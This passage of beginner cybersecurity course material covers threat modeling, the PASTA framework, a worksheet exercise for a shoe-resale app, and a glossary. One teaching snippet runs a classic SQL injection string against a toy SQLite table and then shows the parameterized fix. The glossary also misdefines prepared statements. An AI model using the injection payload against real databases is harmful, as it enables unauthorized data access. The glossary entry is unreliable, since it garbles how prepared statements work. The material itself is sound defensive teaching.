investigating SQL injection vulnerabilities on your own.
Key takeaways
Many web applications retrieve data from databases using SQL, and injection attacks are quite common
due to the popularity of the language. As is the case with other kinds of injection attacks, SQL injections
are a result of unexpected user input. It's important to collaborate with app developers to help prevent
these kinds of attacks by sharing your understanding of SQL injection techniques and the defenses that
should be put in place.
A proactive approach to security
Preparing for attacks is an important job that the entire security team is responsible for. Threat
actors have many tools they can use depending on their target. For example, attacking a small
business can be different from attacking a public utility. Each have different assets and
specific defenses to keep them safe. In all cases, anticipating attacks is the key to preparing for
them. In security, we do that by performing an activity known as threat modeling. Threat modeling
is a process of identifying assets, their vulnerabilities, and how each is exposed to threats. We apply
threat modeling to everything we protect. Entire systems, applications, or business processes all get
examined from this security-related perspective. Creating threat models is a lengthy and detailed
activity. They're normally performed by a collection of individuals with years of experience in the
field. Because of that, it's considered to be an advanced skill in security. However, that doesn't mean
you won't be involved. There are several threat modeling frameworks used in the field. Some are
better suited for network security. Others are better for things like information security, or
application development. In general,
there are six steps of a threat model. The first is to define the scope of the model. At this stage, the
team determines what they're building by creating an inventory of assets and classifying them. The
second step is to identify threats. Here, the team defines all potential threat actors. A threat actor is
any person or group who presents a security risk. Threat actors are characterized as being internal
or external. For example, an internal threat actor could be an employee who intentionally exposes an
asset to harm. An example of an external threat actor could be a malicious hacker, or a competing
business. After threat actors have been identified, the team puts together what's known as an attack
tree. An attack tree is a diagram that maps threats to assets. The team tries to be as detailed as
possible when constructing this diagram before moving on. Step three of the threat modeling
process is to characterize the environment. Here, the team applies an attacker mindset to the
business. They consider how the customers and employees interact with the environment. Other
factors they consider are external partners and third party vendors. At step four, their objective is to
analyze threats. Here, the team works together to examine existing protections and identify gaps.
They then rank threats according to the risk score they assign. During step five, the team
decides how to mitigate risk. At this point, the group creates their plan for defending against threats.
The choices here are to avoid risk, transfer it, reduce it, or accept it. The sixth and final step is to
evaluate findings. At this stage, everything that was done during the exercise is documented, fixes
are applied, and the team makes note of any successes they had. They also record any lessons
learned, so they can inform how they approach future threat models. That's an overview of the
general threat modeling process.
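The attack tree described in step two is, at its core, a hierarchy that maps assets to threats and attack vectors. A toy sketch (the assets and threats are made up for illustration) shows one way such a diagram could be represented and enumerated in code:

```python
# Hypothetical attack tree: asset -> threats -> attack vectors.
attack_tree = {
    "customer database": {
        "SQL injection": ["unsanitized login form", "search bar input"],
        "stolen credentials": ["phishing email"],
    },
    "web server": {
        "denial of service": ["botnet traffic flood"],
    },
}

# Walk the tree and list every asset/threat/vector path, the way a
# team might enumerate what needs to be tested to validate threats.
def enumerate_paths(tree):
    return [
        (asset, threat, vector)
        for asset, threats in tree.items()
        for threat, vectors in threats.items()
        for vector in vectors
    ]

for path in enumerate_paths(attack_tree):
    print(" -> ".join(path))
```

Real attack trees are usually drawn as diagrams and are far more detailed, but even a simple structure like this helps a team see which branches still need protections.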
PASTA: The Process for Attack Simulation and
Threat Analysis
Let's finish exploring threat modeling by taking a look at real-world scenarios. This time, we'll use a
standard threat modeling process called PASTA. Imagine that a fitness company is getting ready to
launch their first mobile app. Before the app can go live, the company asks their security team to ensure
the app will protect customer data. The team decides to perform a threat model using the PASTA
framework. PASTA is a popular threat modeling
framework that's used across many industries. PASTA is short for Process for
Attack Simulation and Threat Analysis. There are seven stages
of the PASTA framework. Let's go through each of them to help
this fitness company get their app ready. Stage one of the PASTA threat model
framework is to define business and security objectives. Before starting the threat model, the team
needs to decide what their goals are. The main objective in our example with the fitness company
app is protecting customer data. The team starts by asking a lot of questions at this stage. They'll
need to understand things like how personally identifiable information is handled. Answering these
questions is a key to evaluate the impact of threats that they'll find along the way. Stage two of the
PASTA framework is to define the technical scope. Here, the team's focus is to identify the
application components that must be evaluated. This is what we discussed earlier as the attack
surface. For a mobile app, this will include technology that's
involved while data is at rest and in use. This includes network protocols, security controls, and
other data interactions. At stage three of PASTA, the team's job is to decompose the application. In
other words, we need to identify the existing controls that will protect user data from threats. This
normally means working with the application developers to produce a data flow diagram. A
diagram like this will show how data gets from a user's device to the company's database. It would
also identify the controls in place to protect this data along the way. Stage four of PASTA is next. The
focus here is to perform a threat analysis. This is where the team gets into their attacker mindset.
Here, research is done to collect the most up-to-date information on the type of attacks being used.
Like other technologies, mobile apps have many attack vectors. These change regularly, so the team
would reference resources to stay up-to-date. Stage five of PASTA is performing a vulnerability
analysis. In this stage, the team more deeply investigates potential vulnerabilities by considering
the root of the problem. Next is stage six of PASTA, where the team conducts attack modeling. This is
where the team tests the vulnerabilities that were analyzed in stage five by simulating attacks. The
team does this by creating an attack tree, which looks like a flow chart. For example, an attack tree
for
our mobile app might look like this. Customer information, like user names and passwords, is a
target. This data is normally stored in a database. We've learned that databases are vulnerable to
attacks like SQL injection. So we will add this attack vector to our attack tree. A threat actor might
exploit vulnerabilities caused by unsanitized inputs to attack this vector. The security team uses
attack trees like this to identify attack vectors that need to be tested to validate threats. This is just
one branch of this attack tree. An application, like a fitness app, typically has lots of branches with a
number of other attack vectors. Stage seven of PASTA is to analyze risk and impact. Here, the team
assembles all the information they've collected in stages one through six. By this stage, the team is
in position to make informed risk management recommendations to business stakeholders that
align with their goals. And with that, we made it all the way
through a threat modeling exercise based on the PASTA framework!
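The SQL injection branch of the attack tree described above can be illustrated with a short, hedged sketch. This is a hypothetical example (the table and column names are invented, using an in-memory SQLite database), showing how an unsanitized input changes a query's meaning and how a parameterized query blocks it:

```python
import sqlite3

# Hypothetical users table standing in for the app's database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

malicious_input = "' OR '1'='1"

# Vulnerable: user input is concatenated directly into the SQL string,
# so the injected OR clause makes the WHERE condition always true.
query = "SELECT username FROM users WHERE password = '" + malicious_input + "'"
print(conn.execute(query).fetchall())  # leaks every row: [('alice',)]

# Safer: a parameterized query treats the input as data, never as SQL.
rows = conn.execute(
    "SELECT username FROM users WHERE password = ?", (malicious_input,)
).fetchall()
print(rows)  # [] -- no stored password literally equals the injected string
```

Validating this attack vector during attack modeling often amounts to exactly this kind of test: feeding crafted input to each query path and confirming the control (here, a parameterized query) holds.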
Traits of an effective threat model
Threat modeling is the process of identifying assets, their vulnerabilities, and how each is exposed to
threats. It is a strategic approach that combines various security activities, such as vulnerability
management, threat analysis, and incident response. Security teams commonly perform these exercises
to ensure their systems are adequately protected. Another use of threat modeling is to proactively find
ways of reducing risks to any system or business process.
Traditionally, threat modeling is associated with the field of application development. In this reading,
you will learn about common threat modeling frameworks that are used to design software that can
withstand attacks. You'll also learn about the growing need for application security and ways that you
can participate.
Why application security matters
Applications have become an essential part of many organizations' success. For example, web-based
applications allow customers from anywhere in the world to connect with businesses, their partners,
and other customers.
Mobile applications have also changed the way people access the digital world. Smartphones are often
the main way that data is exchanged between users and a business. The volume of data being processed
by applications makes securing them a key to reducing risk for everyone who’s connected.
For example, say an application uses Java-based logging libraries with the Log4Shell vulnerability (CVE-2021-44228). If it's not patched, this vulnerability can allow remote code execution that an attacker can
use to gain full access to your system from anywhere in the world. If exploited, a critical vulnerability
like this can impact millions of devices.
Defending the application layer
Defending the application layer requires proper testing to uncover weaknesses that can lead to risk.
Threat modeling is one of the primary ways to ensure that an application meets security requirements.
A DevSecOps team, which stands for development, security, and operations, usually performs these
analyses.
A typical threat modeling process is performed in a cycle:
● Define the scope
● Identify threats
● Characterize the environment
● Analyze threats
● Mitigate risks
● Evaluate findings
Ideally, threat modeling should be performed before, during, and after an application is developed.
However, conducting a thorough software analysis takes time and resources. Everything from the
application's architecture to its business purposes should be evaluated. As a result, a number of threat-modeling frameworks have been developed over the years to make the process smoother.
Note: Threat modeling should be incorporated at every stage of the software development lifecycle, or
SDLC.
Common frameworks
When performing threat modeling, there are multiple methods that can be used, such as:
● STRIDE
● PASTA
● Trike
● VAST
Organizations might use any one of these to gather intelligence and make decisions to improve their
security posture. Ultimately, the “right” model depends on the situation and the types of risks an
application might face.
STRIDE
STRIDE is a threat-modeling framework developed by Microsoft. It’s commonly used to identify
vulnerabilities in six specific attack vectors. The acronym represents each of these vectors: spoofing,
tampering, repudiation, information disclosure, denial of service, and elevation of privilege.
PASTA
The Process of Attack Simulation and Threat Analysis (PASTA) is a risk-centric threat modeling process
developed by two OWASP leaders and supported by a cybersecurity firm called VerSprite. Its main focus
is to discover evidence of viable threats and represent this information as a model. PASTA's evidence-based design can be applied when threat modeling an application or the environment that supports that
application. Its seven-stage process consists of various activities that incorporate relevant security
artifacts of the environment, like vulnerability assessment reports.
Trike
Trike is an open source methodology and tool that takes a security-centric approach to threat modeling.
It's commonly used to focus on security permissions, application use cases, privilege models, and other
elements that support a secure environment.
VAST
The Visual, Agile, and Simple Threat (VAST) Modeling framework is part of an automated threat-modeling platform called ThreatModeler®. Many security teams opt to use VAST as a way of automating
and streamlining their threat modeling assessments.
Participating in threat modeling
Threat modeling is often performed by experienced security professionals, but it’s almost never done
alone. This is especially true when it comes to securing applications. Programs are complex systems
responsible for handling a lot of data and processing a variety of commands from users and other
systems.
One of the keys to threat modeling is asking the right questions:
● What are we working on?
● What kinds of things can go wrong?
● What are we doing about it?
● Have we addressed everything?
● Did we do a good job?
It takes time and practice to learn how to work with things like data flow diagrams and attack trees.
However, anyone can learn to be an effective threat modeler. Regardless of your level of experience,
participating in one of these exercises always starts with simply asking the right questions.
Key takeaways
Many people rely on software applications in their day-to-day lives. Securing the applications that people
use has never been more important. Threat modeling is one of the main ways to determine whether
security controls are in place to protect data privacy. Building the skills required to lead a threat
modeling activity is a matter of practice. However, even a security analyst with little experience can be a
valuable contributor to the process. It all starts with applying an attacker mindset and thinking critically
about how data is handled.
Activity: Apply the PASTA threat model framework
Activity Overview
In this activity, you will practice using the Process of Attack Simulation and Threat Analysis
(PASTA) threat model framework. You will determine whether a new shopping app is safe
to launch.
Threat modeling is an important part of secure software development. Security teams
typically perform threat models to identify vulnerabilities before malicious actors do.
PASTA is a commonly used framework for assessing the risk profile of new applications.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You’re part of the growing security team at a company for sneaker enthusiasts and
collectors. The business is preparing to launch a mobile app that makes it easy for their
customers to buy and sell shoes.
You are performing a threat model of the application using the PASTA framework. You will
go through each of the seven stages of the framework to identify security requirements for
the new sneaker company app.
Part 2 - Complete the PASTA stages
Step 1: Identify the mobile app’s business objectives
The main goal of Stage I of the PASTA framework is to understand why the application was developed
and what it is expected to do.
Note: Stage I typically requires gathering input from many individuals at a business.
First, review the following description of why the sneaker company decided to develop this new app:
Description: Our application should seamlessly connect sellers and shoppers. It should be easy for users
to sign up, log in, and manage their accounts. Data privacy is a big concern for us. We want users to feel
confident that we’re being responsible with their information.
Buyers should be able to directly message sellers with questions. They should also have the ability to
rate sellers to encourage good service. Sales should be clear and quick to process. Users should have
several payment options for a smooth checkout process. Proper payment handling is really important
because we want to avoid legal issues.
In the Stage I row of the PASTA worksheet, make 2-3 notes of business objectives that you’ve identified
from the description.
Step 2: Define the technological scope of the project
In Stage II, the technological scope of the project is defined. Normally, the application development team
is involved in this stage because they have the most knowledge about the code base and application
logic. Your responsibility as a security professional would be to evaluate the application's architecture
for security risks.
For example, the app will be exchanging and storing a lot of user data. These are some of the
technologies that it uses:
● Application programming interface (API): An API is a set of rules that define how software components interact with each other. In application development, third-party APIs are commonly used to add functionality without having to program it from scratch.
● Public key infrastructure (PKI): PKI is an encryption framework that secures the exchange of online information. The mobile app uses a combination of symmetric and asymmetric encryption algorithms: AES and RSA. AES encryption is used to encrypt sensitive data, such as credit card information. RSA encryption is used to exchange keys between the app and a user's device.
● SHA-256: SHA-256 is a commonly used hash function that takes an input of any length and produces a digest of 256 bits. The sneaker app will use SHA-256 to protect sensitive user data, like passwords and credit card numbers.
● Structured query language (SQL): SQL is a programming language used to create, interact with, and request information from a database. For example, the mobile app uses SQL to store information about the sneakers that are for sale, as well as the sellers who are selling them. It also uses SQL to access that data during a purchase.
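To make the encryption and hashing building blocks concrete, here is a minimal Python sketch of a hybrid AES/RSA scheme like the one described above. It assumes the third-party `cryptography` package (`pip install cryptography`); the key sizes and sample data are illustrative, not the app's actual implementation:

```python
import hashlib
import os

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# RSA key pair: in practice the server keeps the private key and the
# app ships with only the public key.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# AES (symmetric) encrypts the sensitive payload itself.
aes_key = AESGCM.generate_key(bit_length=256)
nonce = os.urandom(12)  # AES-GCM requires a unique nonce per message
card_number = b"4111 1111 1111 1111"  # sample data, not a real card
ciphertext = AESGCM(aes_key).encrypt(nonce, card_number, None)

# RSA (asymmetric) wraps the AES key for the key exchange.
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(aes_key, oaep)

# The server unwraps the AES key with its private key, then decrypts.
recovered_key = private_key.decrypt(wrapped_key, oaep)
assert AESGCM(recovered_key).decrypt(nonce, ciphertext, None) == card_number

# SHA-256 produces a fixed 256-bit digest of any input. (For passwords,
# a salted, slow hash such as bcrypt is generally preferred in practice.)
digest = hashlib.sha256(b"correct horse battery staple").hexdigest()
print(len(digest))  # 64 hex characters = 256 bits
```

The design choice this sketch illustrates is why hybrid schemes exist: RSA is slow and limited in message size, so it only transports the AES key, while fast symmetric AES handles the data itself.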
Consider what you've learned about these technologies:
● Which of these technologies would you evaluate first? How might they present risks from a security perspective?
In the Stage II row of the PASTA worksheet, write 2-3 sentences (40-60 words) that describe why you
chose to prioritize that technology over the others.
Step 3: Review a data flow diagram
During Stage III of PASTA, the objective is to analyze how the application is handling information. Here,
each process is broken down.
For example, one of the app's processes might be to allow buyers to search the database for shoes that
are for sale.
Open the PASTA data flow diagram resource. Review the diagram and consider how the technologies you
evaluated relate to protecting user data in this process.
Note: Software developers usually have detailed data flow diagrams available for security teams to use
and verify that information is being processed securely.
Step 4: Use an attacker mindset to analyze potential threats
Stage IV is about identifying potential threats to the application. This includes threats to the
technologies you listed in Stage II. It also concerns the processes of your data flow diagram from Stage
III.
For example, the app's authentication system could be attacked with a virus. Authentication could also
be attacked if a threat actor social engineers an employee.
In the Stage IV row of the PASTA worksheet, list 2 types of threats that are risks to the information being
handled by the sneaker company's app.
Pro tip: Internal system logs that you will use as a security analyst are good sources of threat intel.
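As a small illustration of mining logs for threat intel, the sketch below counts failed login attempts per source in some hypothetical authentication log lines (the log format and the threshold are invented for the example; real formats vary by system):

```python
from collections import Counter

# Hypothetical auth log lines standing in for internal system logs.
log_lines = [
    "2023-11-01 09:14:02 LOGIN FAIL user=admin src=203.0.113.7",
    "2023-11-01 09:14:05 LOGIN FAIL user=admin src=203.0.113.7",
    "2023-11-01 09:14:09 LOGIN FAIL user=admin src=203.0.113.7",
    "2023-11-01 09:15:11 LOGIN OK   user=mika  src=198.51.100.23",
]

# Count failed logins per source IP address.
failures = Counter(
    line.split("src=")[1] for line in log_lines if "LOGIN FAIL" in line
)

# Flag sources above an arbitrary threshold as possible brute-force activity.
suspects = [src for src, count in failures.items() if count >= 3]
print(suspects)  # ['203.0.113.7']
```

Repeated authentication failures from a single source are one signal of the brute-force threats you might list in the Stage IV row.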
Step 5: List vulnerabilities that can be exploited by those threats
Stage V of PASTA is the vulnerability analysis. Here, you need to consider the attack surface of the
technologies listed in Stage II.
For example, the app will use a payment system. The form used to collect credit card information might
be vulnerable if it fails to encrypt data.
In Stage V of the PASTA worksheet, list 2 types of vulnerabilities that could be exploited.
Pro tip: Resources like the CVE® list and OWASP are useful for finding common software vulnerabilities.
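Input validation is one way to shrink this kind of attack surface. As a hedged sketch (the function name and rules are invented for illustration), a payment form handler might reject malformed card numbers before they reach the payment system, using the standard Luhn checksum:

```python
def looks_like_card_number(value: str) -> bool:
    """Validate a card-number field: digits only, plausible length,
    and a passing Luhn checksum. Rejecting bad input early keeps
    unexpected characters out of downstream processing."""
    digits = value.replace(" ", "")
    if not digits.isdigit() or not 13 <= len(digits) <= 19:
        return False
    # Luhn checksum: double every second digit from the right,
    # subtract 9 when doubling exceeds 9; total must divide by 10.
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(looks_like_card_number("4111 1111 1111 1111"))  # True (test number)
print(looks_like_card_number("4111 1111 1111 1112"))  # False (bad checksum)
print(looks_like_card_number("' OR '1'='1"))          # False (not digits)
```

Validation like this complements, rather than replaces, encrypting the data in transit and at rest.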
Step 6: Map assets, threats, and vulnerabilities to an attack tree
In Stage VI of PASTA, the information gathered in the previous two steps is used to build an attack tree.
Open the PASTA attack tree resource. Review the diagram and consider how threat actors can
potentially exploit these attack vectors.
Note: Applications like this normally have large, complex attack trees with many branches.
Step 7: Identify new security controls that can reduce risk
PASTA threat modeling is commonly used to reduce the likelihood of security risks. In Stage VII, the final
goal is to implement defenses and safeguards that mitigate threats.
In Stage VII of the PASTA worksheet, list 4 security controls that you have learned about that can reduce
the chances of a security incident, like a data breach.
What to Include in Your Response
Be sure to address the following elements in your completed activity:
● 2-3 business objectives
● 2-3 technology requirements
● 2 potential threats
● 2 system vulnerabilities
● 4 defenses that limit risk
Glossary terms from module 4
Terms and definitions from Course 5, Module 4
● Angler phishing: A technique where attackers impersonate customer service representatives on social media
● Advanced persistent threat (APT): Instances when a threat actor maintains unauthorized access to a system for an extended period of time
● Adware: A type of legitimate software that is sometimes used to display digital advertisements in applications
● Attack tree: A diagram that maps threats to assets
● Baiting: A social engineering tactic that tempts people into compromising their security
● Botnet: A collection of computers infected by malware that are under the control of a single threat actor, known as the “bot-herder"
● Cross-site scripting (XSS): An injection attack that inserts code into a vulnerable website or web application
● Cryptojacking: A form of malware that installs software to illegally mine cryptocurrencies
● DOM-based XSS attack: An instance when malicious script exists in the webpage a browser loads
● Dropper: A type of malware that comes packed with malicious code which is delivered and installed onto a target system
● Fileless malware: Malware that does not need to be installed by the user because it uses legitimate programs that are already installed to infect a computer
● Hacker: Any person or group who uses computers to gain unauthorized access to data
● Identity and access management (IAM): A collection of processes and technologies that helps organizations manage digital identities in their environment
● Injection attack: Malicious code inserted into a vulnerable application
● Input validation: Programming that validates inputs from users and other programs
● Intrusion detection system (IDS): An application that monitors system activity and alerts on possible intrusions
● Loader: A type of malware that downloads strains of malicious code from an external source and installs them onto a target system
● Malware: Software designed to harm devices or networks
● Process of Attack Simulation and Threat Analysis (PASTA): A popular threat modeling framework that’s used across many industries
● Phishing: The use of digital communications to trick people into revealing sensitive data or deploying malicious software
● Phishing kit: A collection of software tools needed to launch a phishing campaign
● Prepared statement: A coding technique that executes SQL statements before passing them onto the database
● Potentially unwanted application (PUA): A type of unwanted software that is bundled in with legitimate programs which might display ads, cause device slowdown, or install other software
● Quid pro quo: A type of baiting used to trick someone into believing that they’ll be rewarded in return for sharing access, information, or money
● Ransomware: Type of malicious attack where attackers encrypt an organization’s data and demand payment to restore access
● Reflected XSS attack: An instance when malicious script is sent to a server and activated during the server’s response
● Rootkit: Malware that provides remote, administrative access to a computer
● Scareware: Malware that employs tactics to frighten users into infecting their device
● Smishing: The use of text messages to trick users to obtain sensitive information or to impersonate a known source
● Social engineering: A manipulation technique that exploits human error to gain private information, access, or valuables
● Spear phishing: A malicious email attack targeting a specific user or group of users, appearing to originate from a trusted source
● Spyware: Malware that’s used to gather and sell information without consent
● SQL (Structured Query Language): A programming language used to create, interact with, and request information from a database
● SQL injection: An attack that executes unexpected queries on a database
● Stored XSS attack: An instance when malicious script is injected directly on the server
● Tailgating: A social engineering tactic in which unauthorized people follow an authorized person into a restricted area
● Threat: Any circumstance or event that can negatively impact assets
● Threat actor: Any person or group who presents a security risk
● Threat modeling: The process of identifying assets, their vulnerabilities, and how each is exposed to threats
● Trojan horse: Malware that looks like a legitimate file or program
● Vishing: The exploitation of electronic voice communication to obtain sensitive information or to impersonate a known source
● Watering hole attack: A type of attack when a threat actor compromises a website frequently visited by a specific group of users
● Whaling: A category of spear phishing attempts that are aimed at high-ranking executives in an organization
● Web-based exploits: Malicious code or behavior that’s used to take advantage of coding flaws in a web application
Get started on the next course
Congratulations on completing Course 5 of the Google Cybersecurity Certificate: Assets, Threats, and
Vulnerabilities! In this part of the program, you learned about assets and how they are protected. You
also developed an attacker mindset by exploring the common security controls used to mitigate
vulnerabilities and defend against threats.
The Google Cybersecurity Certificate has eight courses:
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities. (This is the course you just completed. Well done!)
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification.